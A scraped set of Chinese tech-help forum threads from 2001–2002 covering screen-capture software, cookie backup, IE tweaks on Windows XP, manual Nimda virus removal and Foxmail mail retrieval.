这是一个在Win95/98/NT环境下使用的软件，它强大的抓图功能介于Capture Professor和HyperCam之间。为什么这么说呢，因为它不仅有强大的单帧图像捕捉功能，还有动态捕捉屏幕，制成AVI、FLC/FLI、GIF动画或MPG影像文件的能力，另外它的编辑功能和Capture Professor一样非常强大，各种滤镜及修改工具一应俱全，下面看看这个Flash 32到底是个什么
样子。
安装完成后，你看不到主程序界面，只是在任务栏中多了一个小小的照相机图标，这就是Flash 32啦，一切工作都从这个小图标开始。现在右击这个小照相机图标就会出现Setting、help、About三项。help和About项不用多讲，在Setting选项中又分为Misc、Animation和Save as三项。Misc选项中设置屏幕捕捉、DOS环境捕捉、热键和其它杂项，一旦你进入到这个设置中，你会觉得Flash 32想得十分周到，各种功能应有尽有。例如是否在关闭时释放剪贴板，是否在存储后显示结果，是否启动Windows时运行Flash 32，以及设置存盘路径等等，各种方式的快捷键都可以在Misc设置中设定。Animation设置中可以设定制成的FLI/FLC、AVI、MPG影像的各种属性，其中MPG还提供四种制式可供选择。Save as：在这里可以设定要保
存的图像文件的属性，有BMP、GIF、IFF/ILBM、JPG、MIFF、PDF、PNG/MNG、TGA和TIF九种文件存盘格式，每一种都对应一套极其详细的设置。在完成以上设置后，我们在小照相机图标上点左键，就会出现“捕捉图像”、“建立动画”和“退出”选项，在“捕捉图像”中可以选择是捕捉全屏还是多边形，或是用鼠标选择的窗口，甚至是随手画的区域等等。这里特别说明的是它可以捕捉剪贴板中的图像以及一个程序文件中的图像、图标、光标。在“建立动画”中可以选择是AVI、GIF、FLI/FLC还是MPG，选择其中一个时就会进入动态捕捉状态。当然，我们不一定全靠左键来抓图，这一切都可以用快捷键完成，在前面讲的Misc设置中你可以为任何一个捕捉命令设定快捷键，而且这里还提供键盘上Windows功能键的使用。一旦捕捉了一幅图像后，Flash 32庞大的编辑环境就出现了。它具有各种图像修改工具、滤镜、效果等，这里不再多讲，熟悉Photoshop的人一看就懂。
我个人认为Flash 32集众家所长于一身，并且又提供了自身特有的一些功能。比方说它甚至可以从应用程序文件中抓取图像、图标和光标；它增加了对屏幕上手画的任意区域的捕捉功能；在快捷键中增添了新型键盘上提供的Windows功能键的控制……但是一个功能过于庞大的程序，在某一功能上就可能比不上一些专一功能的软件。比如Flash 32的动态捕捉十分厉害，又可以存成AVI、FLI/FLC及动态GIF，甚至是MPG，但它的效果反而没有只能做AVI的HypreCam好，而且HyperCam可以在屏幕上指定的任意区域动态捕捉，Flash 32则只能捕捉全屏和某一窗口，所以说完美的东西是找不到的。因此希望大家在用抓图软件时要根据自己需要的功能进行选择。
以上我们讲了几种静态和动态的屏幕捕捉工具，当然这只是沧海一粟，还有很多很多优秀的图像捕捉软件在等待我们发掘。希望在不久的将来我能为大家介绍更多更好的软件。

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

傻看着你

超级用户
积分：397
发帖：124
来自：
注册：2001-11-29
 发表于 2001-12-14 19:07:43 按此观看傻看着你的个人资料 按此发邮件给傻看着你 发送悄悄话给傻看着你 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看傻看着你的IP
谢谢大家了，我下载了CaptureEze Pro，可是只能用45天，知道的能不能给个注册码？谢谢！
自由光束

终级用户
积分：936
发帖：291
来自：中国·哈尔滨
注册：2000-12-09
 发表于 2001-12-14 21:15:34 按此观看自由光束的个人资料 按此发邮件给自由光束 访问自由光束的主页 自由光束 的 oicq 是2905924,查看 2905924 的资料 发送悄悄话给自由光束 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看自由光束的IP
我推荐用printkey2000功能虽然不象楼上老兄介绍的那几们强大，但它速度快小巧好用，功能强大的，我反到觉得有许多功能用不上！

人活着就应该有梦想，如果人活着没有梦想，那和咸鱼有什么区别？
个人主页： http://sunber.home.sohu.com
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-12-14 23:32:10 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
抓屏王！

华军有的下！

^^
northice

终级用户
积分：503
发帖：454
来自：来的地方
注册：2001-02-22
 发表于 2001-12-15 12:46:08 按此观看northice的个人资料 按此发邮件给northice northice 的 oicq 是3418177,查看 3418177 的资料 发送悄悄话给northice 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看northice的IP
snagit

YOU MUST GO,OR YOU WILL BE SAD!
HappyWalker

高级用户
积分：259
发帖：144
来自：福建省－福州市
注册：2001-02-03
 发表于 2001-12-15 13:11:14 按此观看HappyWalker的个人资料 按此发邮件给HappyWalker 访问HappyWalker的主页 HappyWalker 的 oicq 是18571576,查看 18571576 的资料 发送悄悄话给HappyWalker 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看HappyWalker的IP
对，snagit乱好用，而且还可以截word窗口中的图，支持自动滚屏

**********************************

我自横刀向天笑，去留肝胆两昆仑

**********************************

天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-12-15 18:49:22 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
northice在上个帖子中说
引用:
snagit

英雄所见略同

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
crystal

水晶
积分：2499
发帖：2822
来自：QUAKE
注册：2000-01-30
 发表于 2001-12-15 22:18:21 按此观看crystal的个人资料 该用户不允许显示它的电子邮件 访问crystal的主页 crystal 的 oicq 是1073810,查看 1073810 的资料 发送悄悄话给crystal 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看crystal的IP
天外飞猪在上个帖子中说
引用:
northice在上个帖子中说
引用:
snagit

英雄所见略同

英雄所见略略同

书山有路勤为径，学海无涯苦作舟　　Current Project : JSP Nuke
op

终级用户
积分：527
发帖：190
来自：bj
注册：2000-04-07
 发表于 2001-12-16 20:11:48 按此观看op的个人资料 按此发邮件给op op 的 oicq 是1460138,查看 1460138 的资料 发送悄悄话给op 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看op的IP
呵呵，我一直都在用snap it，好用呀，有时间大家可以试一下，

want add live in ur life
uninstall

初级用户
积分：0
发帖：1
来自：
注册：2001-12-17
 发表于 2001-12-17 00:08:58 按此观看uninstall的个人资料 按此发邮件给uninstall 发送悄悄话给uninstall 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看uninstall的IP
我用的是html2jpg，能把整个页面的画面截下来啊。应该比用拷屏的效果要好。
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-17 02:42:42 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
crystal在上个帖子中说
引用:
天外飞猪在上个帖子中说
引用:
northice在上个帖子中说
引用:
snagit

英雄所见略同

英雄所见略略同

经典我最早用的SnagIt
功能无与伦比
可自定义压缩器
可矩形、椭圆、任意形状截屏
可截取屏幕上任一对象（比如一个图标、一个按钮或是一个窗口）
配合GIF Movie Gear
制作GIF动画教程的最佳搭配
现在版本6

[这消息被赵鹏编辑过(编辑时间2001-12-17 02:58:28)]

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
上一贴 | 下一贴
快速回复 | 主题：请问：你们是用什么软件东西截图的？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


Cookie可以备份吗？

计算机技术
Cookie可以备份吗？

上一贴 | 下一贴
发表人 主题: Cookie可以备份吗？
Carl

Violinist
积分：2514
发帖：995
来自：安徽，合肥
注册：2000-12-28
 发表于 2001-12-26 14:08:15 按此观看Carl的个人资料 按此发邮件给Carl 访问Carl的主页 收藏该主题供以后查看 发送悄悄话给Carl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Carl的IP
想重做系统了，但是又不想去回忆那些一大堆的用户名和密码，怎么将Cookie备份一下呢？

╰○︿
  ︿ )
    (
northice

终级用户
积分：503
发帖：454
来自：来的地方
注册：2001-02-22
 发表于 2001-12-26 17:24:19 按此观看northice的个人资料 按此发邮件给northice northice 的 oicq 是3418177,查看 3418177 的资料 发送悄悄话给northice 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看northice的IP
WINDOWS/COOKIES里的，
既然删了就要重新登录了，想必只要把它保留就可以的
把COOKIE文件备份一下应该可以，我想

YOU MUST GO,OR YOU WILL BE SAD!
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2001-12-26 17:30:23 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
Internet Explorer 的导出功能。
carl

Violinist
积分：2514
发帖：995
来自：安徽，合肥
注册：2000-12-28
 发表于 2001-12-27 09:04:45 按此观看carl的个人资料 按此发邮件给carl 访问carl的主页 发送悄悄话给carl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看carl的IP
Bee007在上个帖子中说
引用:
Internet Explorer 的导出功能。

明白了，Netscape一定也有这功能！

╰○︿
  ︿ )
    (
上一贴 | 下一贴
快速回复 | 主题：Cookie可以备份吗？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


浏览器窗口的问题

计算机技术
浏览器窗口的问题

上一贴 | 下一贴
发表人 | 主题: 浏览器窗口的问题
handmade 手工感情 现任版主 积分：2887 发帖：1603 来自：广州 注册：2000-06-30 | 发表于 2002-01-02 13:58:20 按此观看handmade的个人资料 按此发邮件给handmade handmade 的 oicq 是797286,查看 797286 的资料 收藏该主题供以后查看 发送悄悄话给handmade 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看handmade的IP 现在用shift+点击连接弹出的新窗口一律最小化在右下角，一定要点击最大化才能全屏，试着将窗口拖到一定大小后按shift+关闭之后还是不行，有没有解决办法呵？ 你看见我的时候，我在你上空飞翔 Blueidea Web Team. Moderator Of Flash forum
大哥 超级用户 积分：318 发帖：111 来自： 注册：2001-12-20 | 发表于 2002-01-03 13:18:15 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP 这个问题一般是由于网页中的某个JS脚本设置了浏览器的大小后，浏览器记录了此大小造成的。可以通过修改注册表解决： HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement 把这个键名删掉可以恢复默认设置。 老哥我知道的就这么多了。
上一贴 | 下一贴
快速回复 | 主题：浏览器窗口的问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于IE的问题.

计算机技术
关于IE的问题.

上一贴 | 下一贴
发表人 | 主题: 关于IE的问题.
大头 初级用户 积分：14 发帖：4 来自： 注册：2001-12-24 | 发表于 2002-01-16 13:00:13 按此观看大头的个人资料 按此发邮件给大头 收藏该主题供以后查看 发送悄悄话给大头 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大头的IP IE浏览器在全屏状态下可以输入网址吗?我记得好像可以的,哪位告诉我?
len SlowHorse 积分：1192 发帖：568 来自：hebei 注册：2001-09-29 | 发表于 2002-01-16 13:23:36 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP 按ctrl+o,就会出现一个输入框,输网址回车,OK. Dripping water wears away a stone.
上一贴 | 下一贴
快速回复 | 主题：关于IE的问题.
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


为什么xp下的IE启动很慢？

计算机技术
为什么xp下的IE启动很慢？

上一贴 | 下一贴
发表人 主题: 为什么xp下的IE启动很慢？
redtulip

高级用户
积分：208
发帖：106
来自：
注册：2001-12-19
 发表于 2002-01-14 18:48:34 按此观看redtulip的个人资料 按此发邮件给redtulip redtulip 的 oicq 是7701927,查看 7701927 的资料 收藏该主题供以后查看 发送悄悄话给redtulip 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看redtulip的IP
在没有IE窗口状态下，启动第一个IE窗口总是很慢，有时同时启动IE&Photoshop，photoshop会比IE先启动，怎么办？这对俺上blue影响很大呀！

多谢，多谢！
风梦扬

超级用户
积分：331
发帖：125
来自：广州
注册：2000-10-21
 发表于 2002-01-14 19:40:00 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP
Windows XP自带Internet Explorer 6,有个小技巧,修改之后启动得飞快.右键点击Internet Explorer快捷图标(如任务栏上的"快捷启动栏"中那个IE图标),打开图标属性之后在“Target(目标)”后面加上 “ -nohome” 参数,即修改成这样:

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome

[这消息被风梦扬编辑过(编辑时间2002-01-16 19:12:59)]

华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质.

想和NJ们互动么?也欢迎各位一起来参与我们的节目!

进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.

风梦扬

超级用户
积分：331
发帖：125
来自：广州
注册：2000-10-21
 发表于 2002-01-14 19:44:50 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP
需要说明的是,这样启动后的IE呢,你会发现如果你现在执行工具条上大多数的任务是不可行的;比如"文件 -- 打开"啊,"工具 -- internet 选项"啊,"工具 -- windows update"啊等等....

但收藏夹和地址栏还是可用的,你只要执行过url命令,也就是说你的IE只要再进入了另外一个页面之后,那所有的任务都可执行了.

华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质.

想和NJ们互动么?也欢迎各位一起来参与我们的节目!

进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.

redtulip

高级用户
积分：208
发帖：106
来自：
注册：2001-12-19
 发表于 2002-01-15 22:19:46 按此观看redtulip的个人资料 按此发邮件给redtulip redtulip 的 oicq 是7701927,查看 7701927 的资料 发送悄悄话给redtulip 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看redtulip的IP
我试了一下，发现的确启动的很快，但是如果启动（点击） 第二个web页面还是很慢，有没有什么方法，可以关闭IE那些不需要的选项？

多谢，多谢！
Dannie

PiXEL GuaRdEr
积分：17
发帖：18
来自：wUhAn
注册：2001-10-14
 发表于 2002-01-16 09:32:14 按此观看Dannie的个人资料 按此发邮件给Dannie Dannie 的 oicq 是7617997,查看 7617997 的资料 发送悄悄话给Dannie 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Dannie的IP
试了~不让改啊！说路径无效！

既然大家都觉得在一起是件好好的事，不如...结婚吧！
>>>>DannieQiu@sohu.com<<<<
风梦扬

超级用户
积分：331
发帖：125
来自：广州
注册：2000-10-21
 发表于 2002-01-16 19:14:27 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP
redtulip在上个帖子中说
引用:
我试了一下，发现的确启动的很快，但是如果启动（点击） 第二个web页面还是很慢，有没有什么方法，可以关闭IE那些不需要的选项？

我这没问题, 不过不知道你说的 "但是如果启动（点击） 第二个web页面还是很慢",是什么意思? ??

华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质.

想和NJ们互动么?也欢迎各位一起来参与我们的节目!

进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.

风梦扬

超级用户
积分：331
发帖：125
来自：广州
注册：2000-10-21
 发表于 2002-01-16 19:20:06 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP
Dannie在上个帖子中说
引用:
试了~不让改啊！说路径无效！

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome

只对ie 6有效;另外,看清楚,那参数是放在那 引号 的后面的,并且它们之间 相隔 了一个空格.

华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质.

想和NJ们互动么?也欢迎各位一起来参与我们的节目!

进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.

51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-01-16 19:31:04 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
如果cpu不太好，最好还是不要装xp,

IE6.0本身就是一个很占资源的东东，我的是赛扬500，常出现“死窗口“现像

用下面几个方法试试，

主页设为空白页，
在打开的文件夹窗口中输入网址，
要是再不行，就去掉xp吧！

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

sony

终级用户
积分：965
发帖：264
来自：浙江省
注册：2001-10-05
 发表于 2002-01-17 21:07:23 按此观看sony的个人资料 按此发邮件给sony sony 的 oicq 是27869008,查看 27869008 的资料 发送悄悄话给sony 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sony的IP
算了改装"酒吧"吧? xp下的IE总是会占用20%的带宽到ms网站连接升级信息. 但可以改
请教下别的高手吧! 我很菜的喔.
一个刚打开电脑的人.

许多夜晚，你轻柔地依偎在我的身上，用纤纤秀手触摸我身上娇嫩的地方，用小巧细嘴吸出我珍贵的体液，直到满足十分才肯松口离开，唉，这该死的蚊子。
风梦扬

超级用户
积分：331
发帖：125
来自：广州
注册：2000-10-21
 发表于 2002-01-18 16:17:55 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP
sony在上个帖子中说
引用:
算了改装"酒吧"吧? xp下的IE总是会占用20%的带宽到ms网站连接升级信息. 但可以改.

没错,用个软件关闭这些连接信息即可;

另外,XP下的网络设置连接还有 20% 的资源是用于局域网;如果是个人用户不在局域网上的,还可以关闭 QoS Packet Scheduler 以节省这 20% 的资源.

华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质.

想和NJ们互动么?也欢迎各位一起来参与我们的节目!

进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.

上一贴 | 下一贴
快速回复 | 主题：为什么xp下的IE启动很慢？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


nimada怎么杀干净？？？

计算机技术
nimada怎么杀干净？？？

上一贴 | 下一贴
发表人 主题: nimada怎么杀干净？？？
darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2002-01-18 19:34:25 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 收藏该主题供以后查看 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
操作系统win98+2000pro
win98现在启动后系统反应速度极慢！形同死机！win2000可以正常启动，速度也正常。

没有装任何防病毒软件。且2000没有猫的驱动不能上网。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
ImHow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-18 20:23:19 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
在汉化新世纪网站里面有专门杀Nimda的Norton工具

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

cjj31

方与圆
积分：2971
发帖：1044
来自：浙江嘉兴
注册：2000-07-05
 发表于 2002-01-18 20:27:33 按此观看cjj31的个人资料 按此发邮件给cjj31 cjj31 的 oicq 是7777435,查看 7777435 的资料 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
Windows Nt/2000/XP的手工清除方法

    1、结束其中进程名称为“xxx.tmp.exe”以及“Load.exe”的进程(xxx为任意文件名)

    2、删除系统temp文件夹中文件长度为57344的文件

    3、删除系统System文件夹中的长度为57344字节的Riched20.DLL文件及load.exe

    4、打开System.ini文件，在[load]中如果有一行“shell=explorer.exe load.exe -dontrunold”，则改为“shell=explorer.exe”

    5、在硬盘区的根目录下寻找Admin.DLL文件，如果在根目录下存在该文件，则删除它

    6、打开“控制面板|用户和密码”，将Administrator组中的guest帐号删除

    7、把C盘的完全共享取消掉

    8、搜索整个硬盘，把所有readme.eml的文件删除，这时在你没有对系统进行免疫修复前，请不要点击任何readme.eml文件，用ctrl+A选取全部readme.eml文件，删除掉，如果单击了单个readme.eml文件，NIMDA病毒病毒将利用你的系统漏洞重新运行。

    Win9X/Me的手工清除方法

    1、重启操作系统进入到安全模式

    2、删除系统temp文件夹中文件长度为57344的文件

    3、删除系统System文件夹中的长度为57344字节的Riched20.DLL文件及load.exe

    4、打开System.ini文件，在[load]中如果有一行“shell=explorer.exe load.exe -dontrunold”，则改为“shell=explorer.exe”

    5、把C盘的完全共享取消掉

    6、搜索整个硬盘，把所有readme.eml的文件删除，这时在你没有对系统进行免疫修复前，请不要点击任何readme.eml文件，用ctrl+A选取全部readme.eml文件，删除掉，如果单击了单个readme.eml文件，NIMDA病毒病毒将利用你的系统漏洞重新运行。

    尽管这时候你已经清除了NIMDA病毒病毒，但是如果你不对你的系统进行免疫修复的话，你很快会受到新的NIMDA病毒病毒攻击，因为NIMDA病毒病毒的传播复制能力非常强，所以只有你的系统还存在漏洞，你就十分有可能重新再感染上NIMDA病毒病毒，所以天网安全实验室推出了NIMDA病毒病毒免疫方案：

    1、打上微软官方的补丁SP2

    微软官方已经就WINDOWS2000系统目前发现的漏洞做了个“十全大补”的补丁，可以弥补绝大部分的win2000漏洞。SP2共100M左右，可以到以下网址下载：

    http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

    这个补丁恐怕对大多数用户来说是不可能的，100M的文件下载实在太慢了。

    2、使用天网个人版防火墙的修补程序

    在天网个人版防火墙中，提供了包括IE漏洞的天网安全检测修补系统，可以检查出WINDOWS中严重的系统漏洞，并自动修复它。目前的天网个人版(测试版)中所带的漏洞检测与修复系统已经可以检查和修复NIMDA病毒病毒赖以传染和传播的IE浏览器漏洞，所以对于防护NIMDA病毒病毒而言，是一个不可多得的顺手工具。经过了漏洞检测与修复系统修复之后的系统，NIMDA病毒病毒就无法直接在用户的机器上自动运行了。

    另外建议将WSH(Windows Scripting Host)功能删除可预防此类病毒的破坏。

    其步骤是：

    "开始"->"设置"->"控制面版"->"添加删除程序"-〉"WINDOWS按装程序"-〉"附件"，在"组件"中的"Windows scripting Host"(约占空间1.1MB)，去掉选择，选"确定"即可，不过这样可能会影响一些功能。

我笨故我菜！

好好学习，天天向上!

ImHow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-18 20:31:10 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
WSH最好还是不删啊

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

上一贴 | 下一贴
快速回复 | 主题：nimada怎么杀干净？？？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


有关foxmail的一个问题,大虾们遇到过吗?

计算机技术
有关foxmail的一个问题,大虾们遇到过吗?

上一贴 | 下一贴
发表人 主题: 有关foxmail的一个问题,大虾们遇到过吗?
wallace

初级用户
积分：60
发帖：21
来自：乌托邦桃源县爆米花镇
注册：2001-11-27
 发表于 2001-12-12 11:09:09 按此观看wallace的个人资料 按此发邮件给wallace 访问wallace的主页 wallace 的 oicq 是11764861,查看 11764861 的资料 收藏该主题供以后查看 发送悄悄话给wallace 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wallace的IP
我有一个找到啦的油箱,找到啦据说要倒闭了,我想把邮件都下到我的硬盘上。可是用foxmail似乎只能把新的邮件收过来。不知道怎么接受看过的邮件？？我看了帮助也没有说什么阿？？但是应该有办法吧？？请指教：）

生命诚可贵,爱情价更高
倘为自由故,两者皆可抛
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-12 12:33:54 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
全部转发，再用foxmail收，不是办法的办法

WINDFLASH
::浅紫色FORUM::
wallace

初级用户
积分：60
发帖：21
来自：乌托邦桃源县爆米花镇
注册：2001-11-27
 发表于 2001-12-12 15:56:18 按此观看wallace的个人资料 按此发邮件给wallace 访问wallace的主页 wallace 的 oicq 是11764861,查看 11764861 的资料 发送悄悄话给wallace 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wallace的IP
yuzhiqing在上个帖子中说
引用:
全部转发，再用foxmail收，不是办法的办法

这个办法我也想过了，不过页数很多，转发和直接copy然后past有什么区别呢：）foxmail不是没有想到这些bug吧？我相信他们应该考虑周到了。对了，连outlook也不能用这个哦。怎么办呢？

生命诚可贵,爱情价更高
倘为自由故,两者皆可抛
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-12-12 16:35:54 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
你的FOXMAIL的版本？
最新的4.0beta2有‘收取所有’的选项，不知道是不是用于你这种情况的。

[这消息被len编辑过(编辑时间2001-12-12 16:35:49)]

Dripping water wears away a stone.
cloudsea2001

初级用户
积分：3
发帖：2
来自：pds.ha.cn
注册：2001-11-13
 发表于 2001-12-12 17:47:15 按此观看cloudsea2001的个人资料 按此发邮件给cloudsea2001 访问cloudsea2001的主页 cloudsea2001 的 oicq 是17515708,查看 17515708 的资料 发送悄悄话给cloudsea2001 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cloudsea2001的IP
‘收取所以’是指收取所以用户的信。
